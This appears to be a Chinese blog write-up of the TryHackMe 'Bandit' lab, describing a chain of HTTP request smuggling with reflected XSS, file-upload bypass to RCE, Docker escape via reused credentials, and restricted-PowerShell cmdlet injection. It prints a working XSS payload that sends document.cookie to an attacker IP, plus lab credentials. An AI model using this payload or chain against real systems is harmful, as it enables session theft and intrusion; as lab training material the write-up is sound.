TryHackMe - Pentest - Bandit

Bandit

在遥远的未来的元宇宙中,一个名叫杰克剥削者的臭名昭著的网络犯罪分子被抓获,试图从国王的加密钱包中窃取。作为惩罚,他被迫参加多个沙盒游戏。你能帮助他逃脱,远离国王的军队并找到所有的旗帜吗?

为了帮助剥削者杰克,你需要通知他你正在接受挑战!

思路

整体来看比较偏简单,没有什么太大的技术难点,基础中的基础,就是由于公共实验环境的缘故,靶机可能会出现一些问题导致无法正常继续需要重置。

首先通过web的http请求走私漏洞搭配反射xss窃取信息,然后绕过限制导致任意文件上传从而RCE,通过对web服务器进行简单的本地系统信息收集,我们可以读取一组新的凭据用于通过winrm登录到内网windows机器上,这组凭据直接具有windows的本地管理员权限

最终我们发现在windows上我们处于一个受限的shell环境,最后发现一个自定义cmdlet存在注入漏洞,导致rce逃逸出受限环境

就此所有机器向我们妥协

外部信息收集

端口扫描

在这里插入图片描述

80端口的服务可以找到个http走私

在这里插入图片描述

Web枚举

gobuster

在这里插入图片描述

在80端口中,有一个reflected xss

在这里插入图片描述

HTTP请求走私 + XSS

web除了一个xss还有登录页面,结合目前的信息,很容易联想到http走私+xss窃取cookie进入后台

http请求走私没有找到poc,但是很容易就试出来了,CL-TE

在这里插入图片描述

借助xss把cookie弹到我们这边来

GET /?filter="/><script>new+Image().src%3d'http%3a//10.50.127.163%3a8000/%3fc%3d'%2bdocument.cookie</script> HTTP/1.1
foo:

它会到来

在这里插入图片描述

Foothold

带着cookie访问upload.php

在这里插入图片描述

这里简单一测就可以测出来,限制图片类型和文件大小

通过修改MIME类型和缩短payload就可以上传我们的php payload

在这里插入图片描述

直接访问发现没访问到

在这里插入图片描述

根据祖传打靶经验,就可以联想到MD5文件名

在这里插入图片描述

在这里插入图片描述

基操基操

用nc直接连我们的攻击机发现是成功的,直接nc常规反向shell

在这里插入图片描述

结果发现过不来,一下就断了,直接上msf

在这里插入图片描述

curl上传

在这里插入图片描述

给权限然后运行,getshell

在这里插入图片描述

Docker逃逸

在auth.php中看到了登录的凭据,先保存下来

if ($user === 'safeadmin' && $pass === 'HardcodedMeansUnguessableRight') {
        return TRUE;
    }

在容器中翻了个遍,什么也没找着

最后尝试刚刚找到的凭据登录宿主机ssh发现可行

在这里插入图片描述

在这里插入图片描述

内网信息收集

.10端口扫描

查看/etc/hosts可以发现.10机器

在这里插入图片描述

传个nmap过去快速扫一下端口

在这里插入图片描述

最后我发现不需要建立隧道,可以直接访问到.10机器,那么就不考虑sshuttle

.105本地信息收集

我发现了机器上存在powershell,safeadmin用户下存在ConsoleHost_history.txt,并且在ubuntu用户下发现了ConsoleHost_history.txt

但是很不幸的是,可能受到公共实验环境的影响,恰好密码变量定义那一行被覆盖了,万般无奈之下只能有请wp的帮助

在这里插入图片描述

safeuserHelpDesk:Passw0rd

.10权限提升

现在我们可以通过复制粘贴登录进.10机器,通过whoami,我发现了该账户是本地管理员

在这里插入图片描述

很遗憾的是我们进入了一个受限的环境,大多数命令都无法使用

在这里插入图片描述

通过get-command我们可以发现仅有的cmdlet

在这里插入图片描述

Get-ServicesApplication这个cmdlet会输出所有服务名

在这里插入图片描述

通过get-help我们发现它还有一个filter参数

在这里插入图片描述

当我们尝试在filter参数中注入特殊字符时,我们就打开了突破的大门

在这里插入图片描述

最后的rce也很常规,懒得getshell了,拿flag走人

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值